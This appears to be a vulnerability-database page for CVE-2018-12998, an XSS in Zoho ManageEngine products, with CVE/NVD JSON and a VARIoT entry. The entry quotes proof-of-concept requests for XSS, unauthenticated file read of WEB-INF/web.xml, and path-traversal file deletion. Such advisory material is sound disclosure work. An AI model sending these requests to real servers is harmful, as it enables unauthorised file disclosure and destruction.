cvelistv5 - CVE-2018-12998

CVE-2018-12998 (GCVE-0-2018-12998)

Vulnerability from cvelistv5 – Published: 2018-06-29 12:00 – Updated: 2024-08-05 08:52

Summary

Severity ?

No CVSS data available.

CWE

Assigner

mitre

References

URL

Tags

	http://packetstormsecurity.com/files/148635/Zoho-…	x_refsource_MISC
	https://github.com/unh3x/just4cve/issues/10	x_refsource_MISC
	http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNV…	x_refsource_MISC
	http://seclists.org/fulldisclosure/2018/Jul/75	mailing-listx_refsource_FULLDISC

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T08:52:49.220Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/unh3x/just4cve/issues/10"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036"
          },
          {
            "name": "20180720 [CVE-2018-12998]Zoho manageengine Reflected XSS in multiple Products",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2018/Jul/75"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2018-06-29T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter \u0027operation\u0027 to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-07-24T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/unh3x/just4cve/issues/10"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036"
        },
        {
          "name": "20180720 [CVE-2018-12998]Zoho manageengine Reflected XSS in multiple Products",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2018/Jul/75"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-12998",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter \u0027operation\u0027 to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html"
            },
            {
              "name": "https://github.com/unh3x/just4cve/issues/10",
              "refsource": "MISC",
              "url": "https://github.com/unh3x/just4cve/issues/10"
            },
            {
              "name": "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036",
              "refsource": "MISC",
              "url": "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036"
            },
            {
              "name": "20180720 [CVE-2018-12998]Zoho manageengine Reflected XSS in multiple Products",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2018/Jul/75"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2018-12998",
    "datePublished": "2018-06-29T12:00:00",
    "dateReserved": "2018-06-29T00:00:00",
    "dateUpdated": "2024-08-05T08:52:49.220Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"2DFC3545-5EE0-4722-BFB6-58B3AF246F87\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"0940949F-4EB4-460B-8CE9-56B6387250F3\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:zohocorp:manageengine_network_configuration_manager:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"BA1C4C73-FD72-4EE7-BE63-D83C373E6A3F\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:zohocorp:manageengine_opmanager:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"91373406-389A-404C-81A1-BA994B0C06DC\"}, {\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:zohocorp:manageengine_oputils:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"0AE5990D-D4B9-4D55-B221-20A9BF765C0A\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter \u0027operation\u0027 to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.\"}, {\"lang\": \"es\", \"value\": \"Una vulnerabilidad Cross-Site Scripting (XSS) reflejado en Zoho ManageEngine Netflow Analyzer antes de la build 123137, Network Configuration Manager antes de la build 123128, OpManager antes de la build 123148, OpUtils antes de la build 123161, y Firewall Analyzer antes de la build 123147 permite a los atacantes remotos inyectar scripts web o HTML arbitrarios a trav\\u00e9s del par\\u00e1metro \\\"operation\\\" en /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.\"}]",
      "id": "CVE-2018-12998",
      "lastModified": "2024-11-21T03:46:13.193",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\", \"baseScore\": 6.1, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 2.7}], \"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:M/Au:N/C:N/I:P/A:N\", \"baseScore\": 4.3, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"MEDIUM\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"PARTIAL\", \"availabilityImpact\": \"NONE\"}, \"baseSeverity\": \"MEDIUM\", \"exploitabilityScore\": 8.6, \"impactScore\": 2.9, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": true}]}",
      "published": "2018-06-29T12:29:00.500",
      "references": "[{\"url\": \"http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"http://seclists.org/fulldisclosure/2018/Jul/75\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\", \"Mailing List\", \"Third Party Advisory\"]}, {\"url\": \"http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://github.com/unh3x/just4cve/issues/10\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"http://seclists.org/fulldisclosure/2018/Jul/75\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Mailing List\", \"Third Party Advisory\"]}, {\"url\": \"http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://github.com/unh3x/just4cve/issues/10\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}]",
      "sourceIdentifier": "cve@mitre.org",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-79\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2018-12998\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2018-06-29T12:29:00.500\",\"lastModified\":\"2024-11-21T03:46:13.193\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter \u0027operation\u0027 to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.\"},{\"lang\":\"es\",\"value\":\"Una vulnerabilidad Cross-Site Scripting (XSS) reflejado en Zoho ManageEngine Netflow Analyzer antes de la build 123137, Network Configuration Manager antes de la build 123128, OpManager antes de la build 123148, OpUtils antes de la build 123161, y Firewall Analyzer antes de la build 123147 permite a los atacantes remotos inyectar scripts web o HTML arbitrarios a trav\u00e9s del par\u00e1metro \\\"operation\\\" en /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":6.1,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":2.7}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:M/Au:N/C:N/I:P/A:N\",\"baseScore\":4.3,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"MEDIUM\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"NONE\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.6,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":true}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2DFC3545-5EE0-4722-BFB6-58B3AF246F87\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0940949F-4EB4-460B-8CE9-56B6387250F3\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:zohocorp:manageengine_network_configuration_manager:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"BA1C4C73-FD72-4EE7-BE63-D83C373E6A3F\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:zohocorp:manageengine_opmanager:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"91373406-389A-404C-81A1-BA994B0C06DC\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:zohocorp:manageengine_oputils:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"0AE5990D-D4B9-4D55-B221-20A9BF765C0A\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2018/Jul/75\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/unh3x/just4cve/issues/10\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2018/Jul/75\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-036\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/unh3x/just4cve/issues/10\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}"
  }
}

VAR-201806-1164

Vulnerability from variot - Updated: 2024-02-13 22:38

A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. plural Zoho ManageEngine The product contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. ZOHO ManageEngine Netflow Analyzer, etc. are all products of the American company ZOHO. ZOHO ManageEngine Netflow Analyzer is a set of web-based bandwidth monitoring tools. Network Configuration Manager is a suite of network configuration management, network change and configuration management (NCCM) software for configuring switches, routers, firewalls, and other network devices. There are cross-site scripting vulnerabilities in many ZOHO products. This issue has been reported to the vendor who has already published patches for this issue. https://www.manageengine.com/products/applications_manager/issues.html

========================== Advisory:Zoho manageengine Applications Manager Reflected XSSVulnerability Author: M3 From DBAppSecurity Affected Version: All ========================== Proof of Concept: ========================== /GraphicalView.do?method=createBusinessService"scriptalert(5045)/script

Notice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. http://opmanager.helpdocsonline.com/read-me

========================== Advisory:Zoho manageengine Arbitrary File Read in multiple Products Author: M3 From DBAppSecurity Affected Products: Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer ========================== Proof of Concept: ========================== POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx

Notice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue.

========================== Advisory: Zoho manageengine Desktop Central Arbitrary File Deletion Author: M3 From DBAppSecurity Affected Products:Desktop Central ========================== Proof of Concept: ==========================

POST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif

Notice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201806-1164",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "firewall analyzer",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "zohocorp",
        "version": null
      },
      {
        "model": "manageengine netflow analyzer",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "zohocorp",
        "version": null
      },
      {
        "model": "manageengine oputils",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "zohocorp",
        "version": null
      },
      {
        "model": "manageengine network configuration manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "zohocorp",
        "version": null
      },
      {
        "model": "manageengine opmanager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "zohocorp",
        "version": null
      },
      {
        "model": "manageengine firewall analyzer",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "zoho",
        "version": "build 123147"
      },
      {
        "model": "manageengine netflow analyzer",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "zoho",
        "version": "build 123137"
      },
      {
        "model": "manageengine network configuration manager",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "zoho",
        "version": "build 123128"
      },
      {
        "model": "manageengine opmanager",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "zoho",
        "version": "build 123148"
      },
      {
        "model": "manageengine oputils",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "zoho",
        "version": "build 123161"
      },
      {
        "model": "network configuration manager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "zohocorp",
        "version": null
      },
      {
        "model": "oputils",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "zohocorp",
        "version": null
      },
      {
        "model": "opmanager",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "zohocorp",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006785"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-036"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12998"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_opmanager:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_oputils:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_network_configuration_manager:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-12998"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Xiaotian Wang",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "148635"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2018-12998",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2018-12998",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-123013",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.1,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2018-12998",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-12998",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201807-036",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-123013",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2018-12998",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-123013"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-12998"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-006785"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201807-036"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-12998"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
